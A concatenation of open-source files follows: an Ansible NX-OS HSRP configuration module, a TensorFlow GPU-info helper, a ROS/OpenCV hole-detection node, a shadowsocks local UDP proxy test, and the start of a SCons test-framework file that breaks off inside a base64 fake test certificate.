resource doesn't exist yet. Instead, the output will be a raw string
when issuing commands containing 'show run'.
"""
if 'xml' in response[0]:
body = []
elif 'show run' in command:
body = response
else:
try:
response = response[0].replace(command + '\n\n', '').strip()
body = [json.loads(response)]
except ValueError:
module.fail_json(msg='Command does not support JSON output',
command=command)
return body
def execute_show(cmds, module, command_type=None):
command_type_map = {
'cli_show': 'json',
'cli_show_ascii': 'text'
}
try:
if command_type:
response = module.execute(cmds, command_type=command_type)
else:
response = module.execute(cmds)
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending {0}'.format(cmds),
error=str(clie))
except AttributeError:
try:
if command_type:
command_type = command_type_map.get(command_type)
module.cli.add_commands(cmds, output=command_type)
response = module.cli.run_commands()
else:
module.cli.add_commands(cmds, raw=True)
response = module.cli.run_commands()
except ShellError:
clie = get_exception()
module.fail_json(msg='Error sending {0}'.format(cmds),
error=str(clie))
return response
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
command += ' | json'
cmds = [command]
response = execute_show(cmds, module)
body = get_cli_body_ssh(command, response, module)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = execute_show(cmds, module, command_type=command_type)
return body
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_interface_type(interface):
if interface.upper().startswith('ET'):
return 'ethernet'
elif interface.upper().startswith('VL'):
return 'svi'
elif interface.upper().startswith('LO'):
return 'loopback'
elif interface.upper().startswith('MG'):
return 'management'
elif interface.upper().startswith('MA'):
return 'management'
elif interface.upper().startswith('PO'):
return 'portchannel'
else:
return 'unknown'
def get_interface_mode(interface, intf_type, module):
command = 'show interface {0}'.format(interface)
interface = {}
mode = 'unknown'
if intf_type in ['ethernet', 'portchannel']:
body = execute_show_command(command, module)[0]
interface_table = body['TABLE_interface']['ROW_interface']
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode == 'access' or mode == 'trunk':
mode = 'layer2'
elif intf_type == 'svi':
mode = 'layer3'
return mode
def get_hsrp_groups_on_interfaces(device, module):
command = 'show hsrp all'
body = execute_show_command(command, module)
hsrp = {}
try:
get_data = body[0]['TABLE_grp_detail']['ROW_grp_detail']
except (KeyError, AttributeError):
return {}
for entry in get_data:
interface = str(entry['sh_if_index'].lower())
value = hsrp.get(interface, 'new')
if value == 'new':
hsrp[interface] = []
group = str(entry['sh_group_num'])
hsrp[interface].append(group)
return hsrp
def get_hsrp_group(group, interface, module):
command = 'show hsrp group {0}'.format(group)
body = execute_show_command(command, module)
hsrp = {}
hsrp_key = {
'sh_if_index': 'interface',
'sh_group_num': 'group',
'sh_group_version': 'version',
'sh_cfg_prio': 'priority',
'sh_preempt': 'preempt',
'sh_vip': 'vip',
'sh_authentication_type': 'auth_type',
'sh_authentication_data': 'auth_string'
}
try:
hsrp_table = body[0]['TABLE_grp_detail']['ROW_grp_detail']
except (AttributeError, IndexError, TypeError):
return {}
if isinstance(hsrp_table, dict):
hsrp_table = [hsrp_table]
for hsrp_group in hsrp_table:
parsed_hsrp = apply_key_map(hsrp_key, hsrp_group)
parsed_hsrp['interface'] = parsed_hsrp['interface'].lower()
if parsed_hsrp['version'] == 'v1':
parsed_hsrp['version'] = '1'
elif parsed_hsrp['version'] == 'v2':
parsed_hsrp['version'] = '2'
if parsed_hsrp['interface'] == interface:
return parsed_hsrp
return hsrp
def get_commands_remove_hsrp(group, interface):
commands = []
commands.append('interface {0}'.format(interface))
commands.append('no hsrp {0}'.format(group))
return commands
def get_commands_config_hsrp(delta, interface, args):
commands = []
config_args = {
'group': 'hsrp {group}',
'priority': 'priority {priority}',
'preempt': '{preempt}',
'vip': 'ip {vip}'
}
preempt = delta.get('preempt', None)
group = delta.get('group', None)
if preempt:
if preempt == 'enabled':
delta['preempt'] = 'preempt'
elif preempt == 'disabled':
delta['preempt'] = 'no preempt'
for key, value in delta.items():
command = config_args.get(key, 'DNE').format(**delta)
if command and command != 'DNE':
if key == 'group':
commands.insert(0, command)
else:
commands.append(command)
command = None
auth_type = delta.get('auth_type', None)
auth_string = delta.get('auth_string', None)
if auth_type or auth_string:
if not auth_type:
auth_type = args['auth_type']
elif not auth_string:
auth_string = args['auth_string']
if auth_type == 'md5':
command = 'authentication md5 key-string {0}'.format(auth_string)
commands.append(command)
elif auth_type == 'text':
command = 'authentication text {0}'.format(auth_string)
commands.append(command)
if commands and not group:
commands.insert(0, 'hsrp {0}'.format(args['group']))
version = delta.get('version', None)
if version:
if version == '2':
command = 'hsrp version 2'
elif version == '1':
command = 'hsrp version 1'
commands.insert(0, command)
commands.insert(0, 'interface {0}'.format(interface))
if commands:
if not commands[0].startswith('interface'):
commands.insert(0, 'interface {0}'.format(interface))
return commands
def is_default(interface, module):
command = 'show run interface {0}'.format(interface)
try:
body = execute_show_command(command, module)[0]
if 'invalid' in body.lower():
return 'DNE'
else:
raw_list = body.split('\n')
if raw_list[-1].startswith('interface'):
return True
else:
return False
except (KeyError):
return 'DNE'
def validate_config(body, vip, module):
new_body = ''.join(body)
if "invalid ip address" in new_body.lower():
module.fail_json(msg="Invalid VIP. Possible duplicate IP address.",
vip=vip)
def validate_params(param, module):
value = module.params[param]
version = module.params['version']
if param == 'group':
try:
if (int(value) < 0 or int(value) > 255) and version == '1':
raise ValueError
elif int(value) < 0 or int(value) > 4095:
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'group' must be an integer between"
" 0 and 255 when version 1 and up to 4095 "
"when version 2.", group=value,
version=version)
elif param == 'priority':
try:
if (int(value) < 0 or int(value) > 255):
raise ValueError
except ValueError:
module.fail_json(msg="Warning! 'priority' must be an integer "
"between 0 and 255", priority=value)
def main():
argument_spec = dict(
group=dict(required=True, type='str'),
interface=dict(required=True),
version=dict(choices=['1', '2'], default='2', required=False),
priority=dict(type='str', required=False),
preempt=dict(type='str', choices=['disabled', 'enabled'],
required=False),
vip=dict(type='str', required=False),
auth_type=dict(choices=['text', 'md5'], required=False),
auth_string=dict(type='str', required=False),
state=dict(choices=['absent', 'present'], required=False,
default='present'),
include_defaults=dict(default=True),
config=dict(),
save=dict(type='bool', default=False)
)
module = get_network_module(argument_spec=argument_spec,
supports_check_mode=True)
interface = module.params['interface'].lower()
group = module.params['group']
version = module.params['version']
state = module.params['state']
priority = module.params['priority']
preempt = module.params['preempt']
vip = module.params['vip']
auth_type = module.params['auth_type']
auth_string = module.params['auth_string']
transport = module.params['transport']
if state == 'present' and not vip:
module.fail_json(msg='the "vip" param is required when state=present')
for param in ['group', 'priority']:
if module.params[param] is not None:
validate_params(param, module)
intf_type = get_interface_type(interface)
if (intf_type != 'ethernet' and transport == 'cli'):
if is_default(interface, module) == 'DNE':
module.fail_json(msg='That interface does not exist yet. Create '
'it first.', interface=interface)
if intf_type == 'loopback':
module.fail_json(msg="Loopback interfaces don't support HSRP.",
interface=interface)
mode = get_interface_mode(interface, intf_type, module)
if mode == 'layer2':
module.fail_json(msg='That interface is a layer2 port.\nMake it '
'a layer 3 port first.', interface=interface)
if auth_type or auth_string:
if not (auth_type and auth_string):
module.fail_json(msg='When using auth parameters, you need BOTH '
'auth_type AND auth_string.')
args = dict(group=group, version=version, priority=priority,
preempt=preempt, vip=vip, auth_type=auth_type,
auth_string=auth_string)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_hsrp_group(group, interface, module)
# This will enforce better practice with md5 and hsrp version.
if proposed.get('auth_type', None) == 'md5':
if proposed['version'] == '1':
module.fail_json(msg="It's recommended to use HSRP v2 "
"when auth_type=md5")
elif not proposed.get('auth_type', None) and existing:
if (proposed['version'] == '1' and
existing['auth_type'] == 'md5'):
module.fail_json(msg="Existing auth_type is md5. It's recommended "
"to use HSRP v2 when using md5")
changed = False
end_state = existing
commands = []
if state == 'present':
delta = dict(
set(proposed.items()).difference(existing.items()))
if delta:
command = get_commands_config_hsrp(delta, interface, args)
commands.extend(command)
elif state == 'absent':
if existing:
command = get_commands_remove_hsrp(group, interface)
commands.extend(command)
if commands:
if module.check_mode:
module.exit_json(changed=True, commands=commands)
else:
body = execute_config_command(commands, module)
if transport == 'cli':
validate_config(body, vip, module)
changed = True
end_state = get_hsrp_group(group, interface, module)
if 'configure' in commands:
commands.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['end_state'] = end_state
results['updates'] = commands
results['changed'] = changed
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
tomasreimers/tensorflow-emscripten | tensorflow/tools/test/gpu_info_lib.py | 157 | 6340 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for getting system information during TensorFlow tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes as ct
import platform
from tensorflow.core.util import test_log_pb2
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
def _gather_gpu_devices_proc():
"""Try to gather NVidia GPU device information via /proc/driver."""
dev_info = []
for f in gfile.Glob("/proc/driver/nvidia/gpus/*/information"):
bus_id = f.split("/")[5]
key_values = dict(line.rstrip().replace("\t", "").split(":", 1)
for line in gfile.GFile(f, "r"))
key_values = dict((k.lower(), v.strip(" ").rstrip(" "))
for (k, v) in key_values.items())
info = test_log_pb2.GPUInfo()
info.model = key_values.get("model", "Unknown")
info.uuid = key_values.get("gpu uuid", "Unknown")
info.bus_id = bus_id
dev_info.append(info)
return dev_info
class CUDADeviceProperties(ct.Structure):
# See $CUDA_HOME/include/cuda_runtime_api.h for the definition of
# the cudaDeviceProp struct.
_fields_ = [
("name", ct.c_char * 256),
("totalGlobalMem", ct.c_size_t),
("sharedMemPerBlock", ct.c_size_t),
("regsPerBlock", ct.c_int),
("warpSize", ct.c_int),
("memPitch", ct.c_size_t),
("maxThreadsPerBlock", ct.c_int),
("maxThreadsDim", ct.c_int * 3),
("maxGridSize", ct.c_int * 3),
("clockRate", ct.c_int),
("totalConstMem", ct.c_size_t),
("major", ct.c_int),
("minor", ct.c_int),
("textureAlignment", ct.c_size_t),
("texturePitchAlignment", ct.c_size_t),
("deviceOverlap", ct.c_int),
("multiProcessorCount", ct.c_int),
("kernelExecTimeoutEnabled", ct.c_int),
("integrated", ct.c_int),
("canMapHostMemory", ct.c_int),
("computeMode", ct.c_int),
("maxTexture1D", ct.c_int),
("maxTexture1DMipmap", ct.c_int),
("maxTexture1DLinear", ct.c_int),
("maxTexture2D", ct.c_int * 2),
("maxTexture2DMipmap", ct.c_int * 2),
("maxTexture2DLinear", ct.c_int * 3),
("maxTexture2DGather", ct.c_int * 2),
("maxTexture3D", ct.c_int * 3),
("maxTexture3DAlt", ct.c_int * 3),
("maxTextureCubemap", ct.c_int),
("maxTexture1DLayered", ct.c_int * 2),
("maxTexture2DLayered", ct.c_int * 3),
("maxTextureCubemapLayered", ct.c_int * 2),
("maxSurface1D", ct.c_int),
("maxSurface2D", ct.c_int * 2),
("maxSurface3D", ct.c_int * 3),
("maxSurface1DLayered", ct.c_int * 2),
("maxSurface2DLayered", ct.c_int * 3),
("maxSurfaceCubemap", ct.c_int),
("maxSurfaceCubemapLayered", ct.c_int * 2),
("surfaceAlignment", ct.c_size_t),
("concurrentKernels", ct.c_int),
("ECCEnabled", ct.c_int),
("pciBusID", ct.c_int),
("pciDeviceID", ct.c_int),
("pciDomainID", ct.c_int),
("tccDriver", ct.c_int),
("asyncEngineCount", ct.c_int),
("unifiedAddressing", ct.c_int),
("memoryClockRate", ct.c_int),
("memoryBusWidth", ct.c_int),
("l2CacheSize", ct.c_int),
("maxThreadsPerMultiProcessor", ct.c_int),
("streamPrioritiesSupported", ct.c_int),
("globalL1CacheSupported", ct.c_int),
("localL1CacheSupported", ct.c_int),
("sharedMemPerMultiprocessor", ct.c_size_t),
("regsPerMultiprocessor", ct.c_int),
("managedMemSupported", ct.c_int),
("isMultiGpuBoard", ct.c_int),
("multiGpuBoardGroupID", ct.c_int),
# Pad with extra space to avoid dereference crashes if future
# versions of CUDA extend the size of this struct.
("__future_buffer", ct.c_char * 4096)
]
def _gather_gpu_devices_cudart():
"""Try to gather NVidia GPU device information via libcudart."""
dev_info = []
system = platform.system()
if system == "Linux":
libcudart = ct.cdll.LoadLibrary("libcudart.so")
elif system == "Darwin":
libcudart = ct.cdll.LoadLibrary("libcudart.dylib")
elif system == "Windows":
libcudart = ct.windll.LoadLibrary("libcudart.dll")
else:
raise NotImplementedError("Cannot identify system.")
version = ct.c_int()
rc = libcudart.cudaRuntimeGetVersion(ct.byref(version))
if rc != 0:
raise ValueError("Could not get version")
if version.value < 6050:
raise NotImplementedError("CUDA version must be between >= 6.5")
device_count = ct.c_int()
libcudart.cudaGetDeviceCount(ct.byref(device_count))
for i in range(device_count.value):
properties = CUDADeviceProperties()
rc = libcudart.cudaGetDeviceProperties(ct.byref(properties), i)
if rc != 0:
raise ValueError("Could not get device properties")
pci_bus_id = " " * 13
rc = libcudart.cudaDeviceGetPCIBusId(ct.c_char_p(pci_bus_id), 13, i)
if rc != 0:
raise ValueError("Could not get device PCI bus id")
info = test_log_pb2.GPUInfo() # No UUID available
info.model = properties.name
info.bus_id = pci_bus_id
dev_info.append(info)
del properties
return dev_info
def gather_gpu_devices():
"""Gather gpu device info.
Returns:
A list of test_log_pb2.GPUInfo messages.
"""
try:
# Prefer using /proc if possible, it provides the UUID.
dev_info = _gather_gpu_devices_proc()
if not dev_info:
raise ValueError("No devices found")
return dev_info
except (IOError, ValueError, errors.OpError):
pass
try:
# Fall back on using libcudart
return _gather_gpu_devices_cudart()
except (OSError, ValueError, NotImplementedError, errors.OpError):
return []
| apache-2.0 |
smARTLab-liv/smartlabatwork-release | slaw_manipulation/src/detect_holes_rgb.py | 1 | 10677 | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
# import thread
import cv
import cv2
import numpy as np
import tf
from math import sin, cos
import math
from slaw_msgs.msg import PoseStampedLabeled, PoseStampedLabeledArray
from j48 import j48_holes
import vision_constants
from vision_helpers import filter_contours, merge_contours, get_holes, pixel_to_m, \
get_darkest_hole, merge_contours_holes, find_m20_head, rotate_point, \
m_to_pixel # single_full2crop_coordinates
FULL_VISUALIZE = False
NO_VISUALIZATION = True
class DetectHolesRGB():
def __init__(self, training=False):
self.bridge = CvBridge()
self.cur_rgb = None
self.training = training
if not training:
# init camera
rospy.Subscriber("/camera/rgb/image_rect_color", Image, self.cb_rgb)
self.img_pub = rospy.Publisher("/vision/image_holes", Image)
self.pose_pub = rospy.Publisher("/vision/detected_holes", PoseStampedLabeledArray)
rate = rospy.Rate(30)
while not rospy.is_shutdown():
if self.cur_rgb is None:
rate.sleep()
continue
color = self.bridge.imgmsg_to_cv(self.cur_rgb, "bgr8")
color = np.array(color, dtype=np.uint8)
self.cur_rgb = None
self.cb_image(color)
rate.sleep()
def cb_rgb(self, msg):
self.cur_rgb = msg
def process_rgb(self, rgb_img):
frame_gray = cv2.cvtColor(rgb_img, cv.CV_RGB2GRAY)
# gray_blurred = cv2.GaussianBlur(frame_gray, (9, 9), 0)
gray_blurred = cv2.medianBlur(frame_gray, 5)
# gray_blurred = cv2.bilateralFilter(frame_gray, 8, 16, 4)
# cv2.imshow("gray_blurred", gray_blurred)
gray_filter = cv2.adaptiveThreshold(gray_blurred,
255.0,
# cv.CV_ADAPTIVE_THRESH_GAUSSIAN_C,
cv.CV_ADAPTIVE_THRESH_MEAN_C,
cv.CV_THRESH_BINARY,
9, # neighbourhood
9)
cv2.bitwise_not(gray_filter, gray_filter)
kernel = np.ones((3, 3), 'uint8')
# gray_erode = gray_filter
gray_erode = cv2.erode(gray_filter, kernel)
kernel2 = np.ones((5, 5), 'uint8')
gray_erode = cv2.dilate(gray_erode, kernel2)
gray_erode = cv2.erode(gray_erode, kernel)
size = rgb_img.shape
size = (size[1] - 1, size[0] - 1)
cv2.rectangle(gray_erode, (0, 0), size,
0, # color
20, # thickness
8, # line-type ???
0) # random shit
return gray_erode
def cb_image(self, color_frame):
try:
# # Crop image
color_frame = color_frame[vision_constants.crop_y[0]:vision_constants.crop_y[1],
vision_constants.crop_x[0]:vision_constants.crop_x[1]]
self.process_image(color_frame)
if not NO_VISUALIZATION:
cv.WaitKey(5)
except CvBridgeError, e:
print e
def process_image(self, color_img):
# make copys
color_img_display = color_img.copy()
frame_gray = cv2.cvtColor(color_img, cv.CV_RGB2GRAY)
processed_rgb = self.process_rgb(color_img)
if FULL_VISUALIZE and not NO_VISUALIZATION:
cv2.imshow("processed_rgb", processed_rgb)
contours_rgb, hierarchy = cv2.findContours(processed_rgb,
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
# # Filter contours (min max area and min max axis length)
contours_rgb = merge_contours(contours_rgb)
contours_rgb, approx_rgb = filter_contours(contours_rgb)
contours_rgb = merge_contours_holes(contours_rgb)
size = color_img.shape
size = (size[1] - 1, size[0] - 1)
cross_w = size[0] / 2 + vision_constants.CROSS_OFF_X
cross_h = size[1] / 2 + vision_constants.CROSS_OFF_Y
cv2.line(color_img_display,
(cross_w, 0),
(cross_w, size[1]),
(255, 255, 0))
cv2.line(color_img_display,
(0, cross_h),
(size[0], cross_h),
(255, 255, 0))
msg_array = PoseStampedLabeledArray()
if not self.training:
time = rospy.Time.now()
msg_array.header.stamp = time
msg_array.header.frame_id = '/arm_base_link'
msg_array.detection_type = 'rgb'
# ## RGB Pipeline
#cv2.drawContours(color_img_display, contours_rgb, -1, (255,0,0), 3)
global_mask_rgb = np.zeros(color_img.shape, dtype=np.uint8)
holes_rgb = get_holes(contours_rgb, frame_gray, global_mask=global_mask_rgb)
## walk through holes
if not self.training:
for i, o in enumerate(holes_rgb):
hole_label = "unknown"
center = o['center']
angle = o['angle']
features = o['features']
cv2.drawContours(color_img_display, [o['contour']], -1, (255, 0, 0), 3)
cv2.circle(color_img_display, tuple(center), 3, (0, 0, 255), 2)
r = 30
#res = classifier_r.find_label(features)
#print res
#hole_label = res[1]
hole_label = j48_holes(features)
cv2.putText(color_img_display, hole_label,
(center[0] - len(hole_label) * 7, center[1] + 15 + int(features[2] / 2)),
cv2.FONT_HERSHEY_PLAIN,
1.5, (0, 255, 0), thickness=2)
if hole_label == 'M20_100_horizontal':
string_res, res = find_m20_head(o['contour'], center, -angle)
#print res
if string_res == 'Down':
#print 'Down', angle
#angle = math.pi - angle
vec = [[0, -1]]
rot_vec = np.array(rotate_point(vec, (0, 0), angle))
#vec = np.array([sin(angle),-cos(angle)])
vec = np.int32(rot_vec * 1 / 2. * features[2])
cv2.circle(color_img_display, tuple(center + vec), 3, (0, 0, 255), 2)
angle += math.pi
#print vec
if string_res == 'Top':
vec = [[0, 1]]
rot_vec = np.array(rotate_point(vec, (0, 0), angle))
#vec = np.array([sin(angle),-cos(angle)])
vec = np.int32(rot_vec * 1 / 2. * features[2])
cv2.circle(color_img_display, tuple(center + vec), 3, (0, 0, 255), 2)
#print 'Top', angle
#print vec
center += m_to_pixel(0.015) * rot_vec
#cv2.drawContours(color_img_display, [res], -1, (255,0,0), 3)
cv2.line(color_img_display,
tuple(np.int32(center) + np.int32([r * cos(angle), r * sin(angle)])),
tuple(np.int32(center) - np.int32([r * cos(angle), r * sin(angle)])),
(0, 0, 255),
2)
## create message
xdist = center[0] - cross_w
ydist = center[1] - cross_h
x_m = pixel_to_m(xdist)
y_m = pixel_to_m(ydist)
msg = PoseStampedLabeled()
msg.pose.header.frame_id = '/arm_base_link'
msg.pose.header.stamp = time
#double check
msg.pose.pose.position.x = y_m
msg.pose.pose.position.y = x_m
quat = tf.transformations.quaternion_from_euler(0, 0, angle)
msg.pose.pose.orientation.x = quat[0]
msg.pose.pose.orientation.y = quat[1]
msg.pose.pose.orientation.z = quat[2]
msg.pose.pose.orientation.w = quat[3]
#print xdist, ydist
#print self.angle
msg.label = hole_label
msg.detection_type = 'rgb'
msg_array.poses.append(msg)
if self.training:
best_rgb = get_darkest_hole(holes_rgb, frame_gray, size)
cv2.drawContours(color_img_display, [best_rgb['contour']], -1, (255, 0, 0), 3)
center = best_rgb['center']
angle = best_rgb['angle']
cv2.circle(color_img_display, tuple(center), 3, (0, 0, 255), 2)
r = 30
cv2.line(color_img_display,
tuple(np.int32(center) + np.int32([r * cos(angle), r * sin(angle)])),
tuple(np.int32(center) - np.int32([r * cos(angle), r * sin(angle)])),
(0, 0, 255),
2)
cv2.putText(color_img_display, "selected", (center[0], center[1]), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0),
thickness=2)
cv2.imshow("hole detection contours_rgb", color_img_display)
#cv2.moveWindow('camera contours_rgb', size_x, size_y)
return best_rgb['features']
# show camera image with annotations
if FULL_VISUALIZE and not NO_VISUALIZATION:
#RGB
hole_image = color_img
kernel = np.ones((9, 9), 'uint8')
global_mask_rgb = cv2.erode(global_mask_rgb, kernel)
hole_image[global_mask_rgb == 0] = 255
cv2.imshow("holes_rgb", hole_image)
#cv2.moveWindow('holes_rgb', 0, size_y)
if not NO_VISUALIZATION:
cv2.imshow("hole detection contours_rgb", color_img_display)
#cv2.moveWindow('camera contours_rgb', size_x, size_y)
self.pose_pub.publish(msg_array)
# publish to ROS
small_img = color_img_display ##detection from depth
cv_mat = cv.fromarray(small_img)
img_msg = self.bridge.cv_to_imgmsg(cv_mat, encoding="bgr8")
self.img_pub.publish(img_msg)
if __name__ == "__main__":
rospy.init_node("detect_holes_rgb")
detect = DetectHolesRGB()
rospy.spin()
# to be save send 0-twist
# vs.send_twist(0, 0)
cv.DestroyAllWindows()
| mit |
free2000fly/shadowsocks | tests/test_udp_src.py | 1009 | 2482 | #!/usr/bin/python
import socket
import socks
SERVER_IP = '127.0.0.1'
SERVER_PORT = 1081
if __name__ == '__main__':
# Test 1: same source port IPv4
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9000))
sock_in1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('127.0.0.1', 9001))
sock_in2.bind(('127.0.0.1', 9002))
sock_out.sendto(b'data', ('127.0.0.1', 9001))
result1 = sock_in1.recvfrom(8)
sock_out.sendto(b'data', ('127.0.0.1', 9002))
result2 = sock_in2.recvfrom(8)
sock_out.close()
sock_in1.close()
sock_in2.close()
# make sure they're from the same source port
assert result1 == result2
# Test 2: same source port IPv6
# try again from the same port but IPv6
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9000))
sock_in1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in2 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('::1', 9001))
sock_in2.bind(('::1', 9002))
sock_out.sendto(b'data', ('::1', 9001))
result1 = sock_in1.recvfrom(8)
sock_out.sendto(b'data', ('::1', 9002))
result2 = sock_in2.recvfrom(8)
sock_out.close()
sock_in1.close()
sock_in2.close()
# make sure they're from the same source port
assert result1 == result2
# Test 3: different source ports IPv6
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9003))
sock_in1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('::1', 9001))
sock_out.sendto(b'data', ('::1', 9001))
result3 = sock_in1.recvfrom(8)
# make sure they're from different source ports
assert result1 != result3
sock_out.close()
sock_in1.close()
| apache-2.0 |
taxilian/swtoolkit | lib/TestFramework.py | 18 | 11615 | #!/usr/bin/python2.4
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Testing framework for the software construction toolkit.
A TestFramework environment object is created via the usual invocation:
import TestFramework
test = TestFramework.TestFramework()
TestFramework is a subclass of TestCommon, which is in turn is a subclass
of TestCmd.
"""
import base64
import os
import re
import sys
import unittest
import TestCommon
import TestSCons
diff_re = TestCommon.diff_re
fail_test = TestCommon.fail_test
no_result = TestCommon.no_result
pass_test = TestCommon.pass_test
match_exact = TestCommon.match_exact
match_re = TestCommon.match_re
match_re_dotall = TestCommon.match_re_dotall
python_executable = TestCommon.python_executable
exe_suffix = TestCommon.exe_suffix
obj_suffix = TestCommon.obj_suffix
shobj_suffix = TestCommon.shobj_suffix
lib_prefix = TestCommon.lib_prefix
lib_suffix = TestCommon.lib_suffix
dll_prefix = TestCommon.dll_prefix
dll_suffix = TestCommon.dll_suffix
file_expr = TestSCons.file_expr
def RunUnitTests(testcase, **kwargs):
"""Runs all unit tests from a test case.
Args:
testcase: Test case class (derived from unittest.TestCase)
kwargs: Optional variables to inject into each test case object.
For example:
RunUnitTests(MyToolTests, scons_globals=scons_globals, root_env=env)
If a test fails, exits the program via sys.exit(3).
"""
# Make the test suite
suite = unittest.makeSuite(testcase)
# Inject variables into each test
for t in suite._tests:
for k, v in kwargs.items():
setattr(t, k, v)
# Run test
result = unittest.TextTestRunner(verbosity=2).run(suite)
if not result.wasSuccessful():
# A unit test failed
sys.exit(3)
class TestFramework(TestCommon.TestCommon):
"""Class for testing this framework.
Default behavior is to test hammer.bat on Windows or hammer.sh on
any other type of system.
A temporary directory gets created (we chdir there) and will be removed
automatically when we exit.
"""
def __init__(self, *args, **kw):
# If they haven't specified that they want to test some other
# explicit program, either in the TestFramework() object creation or
# by setting the $TEST_FRAMEWORK_EXE / %TEST_FRAMEWORK_EXE% environment
# variable, then we test 'hammer.bat' on Windows systems and 'hammer.sh'
# everywhere else.
if not 'program' in kw:
kw['program'] = os.environ.get('TEST_FRAMEWORK_EXE')
if not kw['program']:
if sys.platform == 'win32':
kw['program'] = 'hammer.bat'
else:
kw['program'] = os.getcwd() + '/hammer.sh'
# Pass in the magic workdir value '', which will cause a temporary
# directory to be created and get us chdir'ed there--but save
# the original cwd first in case we need to know where we were...
if not 'workdir' in kw:
kw['workdir'] = ''
TestCommon.TestCommon.__init__(self, *args, **kw)
# Use our match function, so we don't need to worry about trailing
# whitespace on output we want to compare.
self.match = self.match_visible
def FakeWindowsCER(self, filename):
"""Write out a fake windows certificate."""
# Generated with:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
self.write(filename, base64.b64decode("""
MIIB7TCCAVagAwIBAgIQcInZW/UOFodA41ESSHTYuzANBgkqhkiG9w0BAQQFADARMQ8wDQYDVQQD
EwZmYWtlY28wHhcNMDgwNTA3MjAyNjI2WhcNMzkxMjMxMjM1OTU5WjARMQ8wDQYDVQQDEwZmYWtl
Y28wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANERhPhli6dLzhU3xFO81uVPrluufLF9lqF6
tNCN4cX+5JaDWZzjiX+fHR/M+8od6f2VXZ6fML9uIq/8cWOQL/oqfKbX7R/MWCvOzsrpI7iLJu4Z
uYl+VhUWt3bxjl7bfH89NOS5cZhGuF7z/nVS0J0yconFhkFs6IBp3dKMuHMhAgMBAAGjRjBEMEIG
A1UdAQQ7MDmAELq4xibLMx3dvWmlZHSr8S2hEzARMQ8wDQYDVQQDEwZmYWtlY2+CEHCJ2Vv1DhaH
QONREkh02LswDQYJKoZIhvcNAQEEBQADgYEARvV1vBoIoP1DZosFVr11HLgKhffKhXxh8XfFLxd1
JMJc/j8x0iNlW3IcVWNeDxh8x3TTJYODTM9WPXi2PL/Ouw2dPToYRnS5vP31EoXGLYlvp1sxnyzo
